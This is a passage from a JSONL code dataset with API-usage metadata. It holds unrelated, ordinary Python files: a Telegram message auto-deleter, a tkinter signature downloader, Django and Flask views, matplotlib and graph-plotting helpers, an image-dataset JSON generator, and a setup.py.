to_delete.remove(m.id)\n\n\nasync def remove_older_messages():\n async for m in client.iter_messages(chat_id, ids=list(to_delete)):\n if m is not None:\n asyncio.create_task(deletion_task(m))\n\n\n@client.on(events.NewMessage)\nasync def handler(event):\n print(event)\n if event.chat_id not in { chat_id, channel_id }:\n return\n if event.reply_to_msg_id and event.message.message == \"!save\":\n to_delete.remove(event.reply_to_msg_id)\n await event.message.delete()\n return\n client.loop.create_task(deletion_task(event.message))\n\n\nclient.loop.create_task(remove_older_messages())\n", "sub_path": "src/history_cleaner.py", "file_name": "history_cleaner.py", "file_ext": "py", "file_size_in_byte": 3471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.search", "line_number": 46, "usage_type": "call"}, {"api_name": "re.search", "line_number": 85, "usage_type": "call"}, {"api_name": "persistent.to_delete.add", "line_number": 95, "usage_type": "call"}, {"api_name": "persistent.to_delete", "line_number": 95, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 97, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 97, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 97, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 97, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 100, "usage_type": "call"}, {"api_name": "persistent.to_delete", "line_number": 101, "usage_type": "name"}, {"api_name": "persistent.to_delete.remove", "line_number": 103, "usage_type": "call"}, {"api_name": "persistent.to_delete", "line_number": 103, "usage_type": "name"}, {"api_name": "client.client.iter_messages", "line_number": 107, "usage_type": "call"}, {"api_name": "config.chat_id", "line_number": 107, "usage_type": "argument"}, {"api_name": "client.client", "line_number": 107, "usage_type": "name"}, {"api_name": "persistent.to_delete", "line_number": 107, "usage_type": "argument"}, {"api_name": "asyncio.create_task", "line_number": 109, "usage_type": "call"}, {"api_name": "config.chat_id", "line_number": 115, "usage_type": "name"}, {"api_name": "config.channel_id", "line_number": 115, "usage_type": "name"}, {"api_name": "persistent.to_delete.remove", "line_number": 118, "usage_type": "call"}, {"api_name": "persistent.to_delete", "line_number": 118, "usage_type": "name"}, {"api_name": "client.client.loop.create_task", "line_number": 121, "usage_type": "call"}, {"api_name": "client.client.loop", "line_number": 121, "usage_type": "attribute"}, {"api_name": "client.client", "line_number": 121, "usage_type": "name"}, {"api_name": "client.client.on", "line_number": 112, "usage_type": "call"}, {"api_name": "client.client", "line_number": 112, "usage_type": "name"}, {"api_name": "telethon.events.NewMessage", "line_number": 112, "usage_type": "attribute"}, {"api_name": "telethon.events", "line_number": 112, "usage_type": "name"}, {"api_name": "client.client.loop.create_task", "line_number": 124, "usage_type": "call"}, {"api_name": "client.client.loop", "line_number": 124, "usage_type": "attribute"}, {"api_name": "client.client", "line_number": 124, "usage_type": "name"}]} +{"seq_id": "208741396", "text": "from tkinter import *\nfrom tkinter import messagebox\nfrom PIL import Image,ImageTk\nimport requests\nimport re\n\ndef download():\n strat_url = \"http://www.uustv.com/\"\n name = e.get()\n #去空格\n name = name.strip()\n if name == '':\n messagebox.showinfo('提示','请输入用户名')\n else:\n data = {\n 'word':name,\n 'sizes':60,\n 'fonts':'jfcs.ttf',\n 'fontcolor':'#000000'\n }\n result = requests.post(strat_url,data=data)\n result.encoding = 'utf-8'\n html = result.text\n reg = '
.*?
'\n imagepath = re.findall(reg,html)\n #图片的完整路径\n imgurl = strat_url + imagepath[0]\n response = requests.get(imgurl).content\n f = open('{}.gif' .format(name),'wb')\n f.write(response)\n\n\n #显示图片\n bm = ImageTk.PhotoImage(file='{}.gif' .format(name))\n l1 = Label(root,image=bm)\n l1.bm = bm\n l1.grid(row=2,columnspan=2)\n\n\n\n\n\nroot = Tk()\nroot.title(\"签名设计\")\nroot.geometry(\"600x300+500+200\")\n\nl = Label(root,text='签名', font=('华文行楷',20),fg='green')\nl.grid(row=0,column=0)\n\ne = Entry(root,font=('微软雅黑', 20))\ne.grid(row=0, column=1)\n\nb = Button(root,text='设计签名',font=(\"微软雅黑\",20),fg='blue',command=download)\nb.grid(row=1,column=0)\n\n\n\n\nroot.mainloop()", "sub_path": "tkinterproject/test/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1402, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tkinter.messagebox.showinfo", "line_number": 13, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 13, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 21, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "447143310", "text": "from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\n\nfrom .forms import NameForm\n\nimport redis\n\nr = redis.StrictRedis(host='localhost', port=6379, db=0)\n\n#Django: working with forms (djangoproject)\ndef get_name(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = NameForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n firstname = form.cleaned_data['firstname']\n lastname = form.cleaned_data['lastname']\n url = \"http://api.icndb.com/jokes/random?firstName=\" + firstname + \"&lastName=\" + lastname\n # redirect to a new URL:\n return HttpResponseRedirect('#')\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = NameForm()\n\n return render(request, 'jokesApp/index.html', {'form': form})", "sub_path": "chuck_norris/jokesApp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1054, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "redis.StrictRedis", "line_number": 8, "usage_type": "call"}, {"api_name": "forms.NameForm", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 23, "usage_type": "call"}, {"api_name": "forms.NameForm", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "306325436", "text": "import torch, matplotlib as mpl, seaborn as sns, numpy as np\nimport matplotlib.pyplot as plt, matplotlib.collections as mc\n\ndef _init():\n \"\"\"Default font formatting\"\"\"\n mpl.rc('font', weight='bold', size=36)\n return plt.subplots(figsize=[16,9])\n\ndef _format(ax):\n \"\"\"Default plot formatting\"\"\"\n ax.autoscale()\n plt.xlabel(\"Wire\")\n plt.ylabel(\"Time tick\")\n plt.tight_layout()\n\ndef _get_lines(g, score):\n \"\"\"Take a g object and return a list of LineCollection objects, one per class\"\"\"\n # wire = g.x[:,1]\n # time = g.x[:,2]\n wire = g[\"x\"][:,1]\n time = g[\"x\"][:,2]\n # lines = [ [ [ wire[edge[0]], time[edge[0]] ], [ wire[edge[1]], time[edge[1]] ] ] for edge in g.edge_index.T ]\n lines = [ [ [ wire[edge[0]], time[edge[0]] ], [ wire[edge[1]], time[edge[1]] ] ] for edge in g[\"edge_index\"].T ]\n lines_class = [ [], [], [], [] ]\n colours = ['gainsboro', 'red', 'green', 'blue' ]\n for l, y in zip(lines, score): lines_class[y].append(l)\n return [ mc.LineCollection(lines_class[i], colors=colours[i], linewidths=2, zorder=1) for i in range(len(colours)) ]\n\ndef plot_node_score(g, y):\n \"\"\"Plot graph nodes, colour-coded by node label\"\"\"\n fig, ax = _init()\n c = np.array(sns.color_palette())[y]\n plt.scatter(g[\"x\"][:,1], g[\"x\"][:,2], c=c, s=8)\n _format(ax)\n\ndef plot_edge_score(g, y):\n \"\"\"Plot graph edges, colour-coded by edge score\"\"\"\n fig, ax = _init()\n lcs = _get_lines(g, y)\n for lc in lcs: ax.add_collection(lc)\n _format(ax)\n\ndef plot_edge_diff(g, y):\n \"\"\"Plot graph edges, highlighting edges that were misclassified\"\"\"\n fig, ax = _init()\n y = (y != g.y)\n lcs = _get_lines(g, y)\n for lc in lcs: ax.add_collection(lc)\n _format(ax)\n\n", "sub_path": "numl/plot/graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 1662, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.rc", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.collections", "line_number": 27, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "seaborn.color_palette", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "456235087", "text": "import methods2\nimport os\nfrom flask import Flask, request, jsonify\napp = Flask(__name__)\n\nport = 8000\n\n#app.debug = True\n\n\n\n@app.route(\"///\", methods = ['GET'])\ndef repFunction(lastname, firstname, middle):\n if request.method == 'GET':\n return methods2.getRepFunction(lastname,firstname,middle) \n else: \n return \"Invalid\"\n\n@app.route(\"/account/\", methods = ['POST'])\ndef getInstallData(gdun):\n if request.method == 'POST':\n payload = request.get_json()\n return methods2.getInstallData(gdun, payload)\n else:\n return \"Invalid\"\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=port)\n\n\n\n\n\n", "sub_path": "routes2.py", "file_name": "routes2.py", "file_ext": "py", "file_size_in_byte": 652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "methods2.getRepFunction", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "methods2.getInstallData", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "188049173", "text": "#!/usr/bin/env python\n\nfrom factory.factory import serializer\n\ntypes = {\n \"yaml\": serializer.get_parser(\"yaml\"),\n \"json\": serializer.get_parser(\"json\"),\n}\n\n\ndef dump(in_file, out_file):\n ifile = open(in_file, \"r\")\n ofile = open(out_file, \"w\")\n obj = types[in_file.split(\".\")[-1].lower()].unpack(ifile)\n types[out_file.split(\".\")[-1].lower()].pack(obj, ofile)\n ifile.close()\n ofile.close()\n", "sub_path": "Lab_2/application/dump.py", "file_name": "dump.py", "file_ext": "py", "file_size_in_byte": 413, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "factory.factory.serializer.get_parser", "line_number": 6, "usage_type": "call"}, {"api_name": "factory.factory.serializer", "line_number": 6, "usage_type": "name"}, {"api_name": "factory.factory.serializer.get_parser", "line_number": 7, "usage_type": "call"}, {"api_name": "factory.factory.serializer", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "7673595", "text": "from __future__ import division\n\nfrom math import pi as PI\n\nimport torch\n\n\nclass SphericalAdj(object):\n \"\"\"Concatenates Cartesian spatial relations based on the position\n :math:`P \\in \\mathbb{R}^{N x D}` of graph nodes to the graph's edge\n attributes.\"\"\"\n\n def __call__(self, data):\n\n index = data.index\n row, col = index\n\n # Compute spherical pseudo-coordinates.\n direction = data.pos[col] - data.pos[row]\n rho = (direction * direction).sum(1).sqrt()\n rho /= rho.max()\n theta = torch.atan2(direction[:, 1], direction[:, 0]) / (2 * PI)\n theta += (theta < 0).type_as(theta)\n phi = torch.acos(direction[:, 2]) / PI\n spherical = torch.stack([rho, theta, phi], dim=1)\n\n if data.weight is None:\n data.weight = spherical\n else:\n data.weight = torch.cat(\n [spherical, data.weight.unsqueeze(1)], dim=1)\n\n return data\n", "sub_path": "torch_geometric/transform/spherical.py", "file_name": "spherical.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.atan2", "line_number": 22, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.acos", "line_number": 24, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "408205942", "text": "\"\"\"MbKit\"\"\"\n\nfrom setuptools import setup, find_packages\nfrom distutils.util import convert_path\nimport glob\n\ndef get_version():\n # Credits to http://stackoverflow.com/a/24517154\n main_ns = {}\n ver_path = convert_path('mbkit/_version.py')\n with open(ver_path) as f_in:\n exec(f_in.read(), main_ns)\n return main_ns['__version__']\n\n# Obtain the current version of ConKit\n__version__ = get_version()\n\n# Do the actual setup below\nsetup(\n name='mbkit',\n description=__doc__.replace(\"\\n\", \"\"),\n long_description=open('README.md').read(),\n version=__version__,\n author='Felix Simkovic, Jens Thomas, Adam Simpkin & Ronan Keegan',\n author_email='felixsimkovic@me.com',\n license='BSD License',\n url='https://github.com/rigdenlab/mbkit',\n download_url='https://github.com/rigdenlab/mbkit/tarball/' + __version__,\n package_dir={'mbkit': 'mbkit'},\n packages=find_packages(exclude=\"tests\"),\n platforms=['Linux', 'Mac OS-X', 'Unix', 'Windows'],\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n ],\n test_suite='nose.collector',\n tests_require=['nose >=1.3.7'],\n include_package_data=True,\n zip_safe=False,\n)\n\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1475, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "distutils.util.convert_path", "line_number": 10, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 19, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "80129732", "text": "#!/usr/bin/env python\nimport os\nimport json\nfrom argparse import ArgumentParser\nfrom python_code.initialization import Initializer\nimport torch\nimport numpy as np\nfrom server import FEATURE_DIM\n\nDEFAULT_DATA_PATH = \"../../images/\"\nFILE_EXTENTIONS = [\"jpg\", \"png\"]\n\nREADME = \"\"\"\\\n1. copy all images into /raw//imgs/\n (please don't use multiple extentions [e.g. 'image.png.jpg'], this has not been tested due to time)\n2. give a+rx rights recursively (`chmod a+rx raw/`)\n3. run this script with a list (subset) of images or use all images in the folder [See EXAMPLES]\n4. punch julian to add the script in the node.js-server\n\"\"\"\n\nEXAMPLES = \"\"\"$ python generate_dataset_json.py -n Demo_Wiki_1 -i demo_wiki_1 -r ~/visiexp/datasets -a\n -> Generates a dataset called 'Demo_Wiki_1' with all images in '~/visiexp/datasets/raw/demo_wiki_1/imgs'\n\n $ python generate_dataset_json.py -n Demo_Wiki_2 -i demo_wiki_1 -r ~/visiexp/datasets -f files.txt\n -> Generates a dataset called 'Demo_Wiki_2' with all images listed in 'files.txt' located in '~/visiexp/datasets/raw/demo_wiki_1/imgs'\n \n $ python generate_dataset_json.py -n Demo_Wiki_3 -i demo_wiki_1 -r ~/visiexp/datasets -e bmp -a\n -> Generates a dataset called 'Demo_Wiki_3', using only bmp-files\"\"\"\n\nLABELFILE_EXAMPLE = \"\"\"\\\nCATEGORIES: animal pose color\nsome_wild_bear bear standing brown\ncat_25_06_2003 cat sitting white\nIMG_20190229_235901 wolpertinger flying gray\n# first line defines categories (\"CATEGORIES:\" mandatory!)\n# use as many spaces as you please\n# non-mentioned images won't receive lables\n\"\"\"\n\nparser = ArgumentParser(description=\"Generates server-readable JSON files for new datasets\")\nparser.add_argument(\"--root\", \"-r\", type=str, default=DEFAULT_DATA_PATH, help=\"Root directory of all datasets.\")\nparser.add_argument(\"--name\", \"-n\", type=str, required=True, help=\"Name of the new dataset.\")\nparser.add_argument(\"--idir\", \"-i\", type=str, required=True, help=\"Name of image folder inside `/raw/`.\")\nparser.add_argument(\"--lfile\", \"-l\", type=str, help=\"File that contains labels in categories.\")\nparser.add_argument(\"--extentions\", \"-e\", type=str, nargs=\"+\", default=FILE_EXTENTIONS, help=\"Possible image extentions. Default: {}\".format(FILE_EXTENTIONS))\nparser_input = parser.add_mutually_exclusive_group(required=True)\nparser_input.add_argument(\"--data\", \"-d\", type=str, nargs=\"+\", help=\"List of names of all data images to be processed. Preceding paths are ignored for easier auto-completion. Conflicts with `-f`, `-a`.\")\nparser_input.add_argument(\"--file\", \"-f\", type=str, nargs=\"?\", help=\"File that contains the names of all data images to be processed. Currently only method to add labels. Conflicts with `-d`, `-a`.\")\nparser_input.add_argument(\"--all\", \"-a\", action=\"store_true\", help=\"Use all files in image folder. Conflicts with `-d`, `-f`.\")\nparser.add_argument(\"--silent\", \"-s\", action=\"store_true\", help=\"Don't be verbose.\")\nparser.add_argument(\"--device\", \"-x\", type=int, default=0, help=\"CUDA device to use\")\n\ndef default(obj):\n if type(obj).__module__ == np.__name__:\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return obj.item()\n raise TypeError('Unknown type:', type(obj))\n\ndef probe_image_file(name, idir):\n if any(name.endswith(\".\" + ext) for ext in args.extentions):\n # if extention is given, only test given extention\n if os.path.isfile(os.path.join(idir, name)):\n return name\n else:\n # else, try all possible extention\n for ext in args.extentions:\n tmp = os.path.join(idir, name + \".\" + ext)\n if os.path.isfile(tmp):\n return name\n return None\n\ndef clean_exts(inp_l):\n res = []\n for item in inp_l:\n if any(item.endswith(\".\" + ext) for ext in args.extentions):\n res.append(item.rsplit(\".\", 1)[0])\n else:\n res.append(item)\n return res\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n # with torch.cuda.device(args.device):\n if True:\n json_path = os.path.abspath(os.path.join(__file__, DEFAULT_DATA_PATH, 'init_json', f'{args.name}.json'))\n if os.path.exists(json_path):\n raise IOError(\"JSON for `{}` already exists.\".format(args.name))\n\n imdir = os.path.abspath(os.path.join(__file__, f'{args.root}{args.idir}'))\n if not os.path.isdir(imdir):\n raise IOError(\"The path `{}` does not exist or is not a directory.\".format(imdir))\n\n # check input data\n if not args.silent: print(\"### Checking Files ###\")\n if args.data is not None:\n data = [os.path.split(x)[1] for x in args.data]\n elif args.file is not None:\n data = [x.strip() for x in open(args.file, 'r')]\n elif args.all is True:\n data = os.listdir(imdir)\n else:\n assert False, \"This should not be happening!\"\n data = sorted(data)\n # error, if files missing\n files = [probe_image_file(f, imdir) for f in data]\n if None in files:\n fail = \"; \".join([data[i] for i,b in enumerate(files) if b is None])\n raise IOError(\"The following data could not be found: {}\".format(fail))\n data = clean_exts(data)\n\n # generate nodes-part for json\n nodes = {name:{'label': '', 'labels': [], 'idx':i, 'x':0, 'y':0} for i, name in enumerate(data)}\n # ^-- this is needed by the Initializer (probably legacy)\n\n # assign labels, if given\n if args.lfile is not None:\n if not args.silent: print(\"### Assigning Labels ###\")\n if not os.path.isfile(args.lfile):\n raise IOError(\"The label file could not be found: {}\".format(args.lfile))\n labelfile = open(args.lfile, 'r')\n first_line = labelfile.readline().split()\n if first_line[0] != \"CATEGORIES:\":\n raise IOError(\"The label file has wrong formatting.\")\n if not first_line[1:]:\n raise IOError(\"The label file has no categories.\")\n categories = first_line[1:]\n for i, line in enumerate(labelfile, 1):\n line = line.split()\n if len(line) != len(categories) + 1:\n raise IOError(\"The label file has the wrong amount of labels in line {}\".format(i))\n img, lables = line[0], line[1:]\n if img not in nodes:\n raise IOError(\"Unknown image id in label file: {}\".format(img))\n nodes[img]['labels'] = lables\n else:\n categories = None\n\n try:\n # generate temporary json to call Initializer\n if not args.silent: print(\"### Generating temporary JSON ###\")\n out = {'im_dir_name': args.idir, 'nodes': nodes, 'temporary': True}\n json.dump(out, open(os.path.abspath(os.path.join(__file__, f'{args.root}{args.name}.json')), \"w\"))\n\n # generate additional resources with Initializer\n if not args.silent: print(\"### Loading Initializer ###\")\n dot_extentions = [\".\" + e for e in args.extentions] + [\"\"]\n init = Initializer(args.name, impath=imdir, info_file=json_path, outdir=args.root, feature_dim=FEATURE_DIM,\n data_extensions=dot_extentions, verbose=True)\n init.initialize(raw_features=True)\n proj = init.make_projection_dict()\n\n # store real JSON with projections\n if not args.silent: print(\"### Generating final JSON ###\")\n for i in range(len(proj['image_id'])):\n for ext in dot_extentions:\n try:\n nodes[proj['image_id'][i] + ext]['x'] = proj['projection'][i][0]\n nodes[proj['image_id'][i] + ext]['y'] = proj['projection'][i][1]\n except KeyError:\n pass\n else: # break, if key worked\n break\n else:\n raise IOError(\"No extention worked for {}\".format(proj['image_id'][i])) # (this should not be happening)\n out = {'im_dir_name': args.idir, 'nodes': nodes}\n if categories is not None:\n out['categories'] = categories\n except:\n if not args.silent: print(\"!#! An error occured, deleting temp files !#!\")\n if os.path.isfile(json_path):\n os.remove(json_path)\n path = os.path.join(args.root, \"norm\", \"{}_mean_std.pkl\")\n if os.path.isfile(path):\n os.remove(path)\n path = os.path.join(args.root, \"features\", \"{}_512.h5\")\n if os.path.isfile(path):\n os.remove(path)\n path = os.path.join(args.root, \"features\", \"{}_512_PCA.h5\")\n if os.path.isfile(path):\n os.remove(path)\n raise\n # sort the node keys to be equal to the sorted image list\n out['nodes'] = sorted(out['nodes'].items())\n out['nodes'] = {x[0]: x[1] for x in out['nodes']}\n json.dump(out, open(json_path, \"w\"), default=default, indent=4)\n", "sub_path": "python_code/generate_dataset_json.py", "file_name": "generate_dataset_json.py", "file_ext": "py", "file_size_in_byte": 9228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.__name__", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "python_code.initialization.Initializer", "line_number": 150, "usage_type": "call"}, {"api_name": "server.FEATURE_DIM", "line_number": 150, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path", "line_number": 175, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 182, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 183, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 188, "usage_type": "call"}]} +{"seq_id": "28471017", "text": "import sys\n\nfrom collections import namedtuple\n\n\nthis_module = sys.modules[__name__]\n\ndef _add_namedtuple_in_this_module(name, attribute_names):\n new_nametuple = namedtuple(name, attribute_names)\n setattr(this_module, name, new_nametuple)\n\nfor name, attrs in (\n ('RawVectors' , 'event pmtrwf sipmrwf pmt_active sipm_active'),\n ('SensorParams' , 'NPMT PMTWL NSIPM SIPMWL'),\n ('CalibParams' , 'coeff_c, coeff_blr, adc_to_pes_pmt adc_to_pes_sipm'),\n ('DeconvParams' , 'n_baseline thr_trigger'),\n ('CalibVectors' , 'channel_id coeff_blr coeff_c adc_to_pes adc_to_pes_sipm pmt_active'),\n ('S12Params' , 'tmin tmax stride lmin lmax rebin'),\n ('PmapParams' ,'s1_params s2_params s1p_params s1_PMT_params s1p_PMT_params'),\n ('ThresholdParams', 'thr_s1 thr_s2 thr_MAU thr_sipm thr_SIPM'),\n ('CalibratedSum' , 'csum csum_mau'),\n ('CalibratedPMT' , 'CPMT CPMT_mau'),\n ('S1PMaps' , 'S1 S1_PMT S1p S1p_PMT'),\n ('PMaps' , 'S1 S2 S2Si'),\n ('Peak' , 't E'),\n ('FitFunction' , 'fn values errors chi2 pvalue'),\n ('Cluster' , 'Q pos rms Nsipm'),\n ('Measurement' , 'value uncertainty')):\n _add_namedtuple_in_this_module(name, attrs)\n\n# Leave nothing but the namedtuple types in the namespace of this module\ndel name, namedtuple, sys, this_module, _add_namedtuple_in_this_module\n", "sub_path": "invisible_cities/reco/params.py", "file_name": "params.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.modules", "line_number": 6, "usage_type": "attribute"}, {"api_name": "collections.namedtuple", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "280009110", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /srv/whitlam/home/users/uqdparks/git/unitem/unitem/plot_common_bases.py\n# Compiled at: 2017-08-25 10:54:04\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os, sys, math, logging\nfrom biolib.common import alphanumeric_sort\nimport svgwrite\n\nclass PlotCommonBases:\n \"\"\"Create heatmap showing percentage of common bases between bins.\"\"\"\n\n def __init__(self):\n \"\"\"Initialization.\"\"\"\n self.logger = logging.getLogger('timestamp')\n self.font_size = 8\n self.cell_font_size = 6\n self.row_height = 2.5 * self.font_size\n self.col_width = self.row_height\n self.cell_offset = 2\n self.qual_col_width = 4 * self.font_size\n\n def _render_label_col(self, dwg, labels, start_x, start_y, group_id):\n \"\"\"Render column of labels.\"\"\"\n label_group = svgwrite.container.Group(id=group_id)\n dwg.add(label_group)\n for i, label in enumerate(labels):\n t = dwg.text(label, x=[\n start_x], y=[\n start_y + i * self.row_height], font_size='%fpt' % self.font_size, text_anchor='end', direction='ltr', fill='black')\n label_group.add(t)\n\n def _render_label_row(self, dwg, labels, label_start_x, row_start_y, group_id, rotation=-45):\n \"\"\"Render column of labels.\"\"\"\n label_group = svgwrite.container.Group(id=group_id)\n dwg.add(label_group)\n for i, label in enumerate(labels):\n x = label_start_x + (i + 0.5) * self.col_width\n t = dwg.text(label, x=[\n x], y=[\n row_start_y], font_size='%fpt' % self.font_size, text_anchor='start', direction='ltr', fill='black')\n t.rotate(rotation, (x, row_start_y))\n label_group.add(t)\n\n def _render_genome_quality_cols(self, dwg, bin_labels, quality, 